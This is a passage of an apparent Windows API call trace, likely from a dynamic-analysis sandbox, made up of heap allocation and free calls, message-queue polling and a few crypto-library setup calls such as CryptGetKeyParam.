lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2638 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.761] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0190.761] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x9c2638 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0190.761] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27b8 [0190.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9c0 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27b8 [0190.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0190.762] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deda8 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2808 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.762] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa548 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0190.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0190.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.763] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0190.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0190.764] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2808 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.764] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0190.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0190.765] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0190.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.765] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0190.765] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.765] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.766] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0190.766] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.767] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.767] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26e8 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0190.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0190.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0190.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0190.769] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0190.770] CryptGetKeyParam (in: hKey=0x90af18, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0190.770] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0190.770] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0190.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0190.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0190.770] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0190.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0190.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0190.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0190.770] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 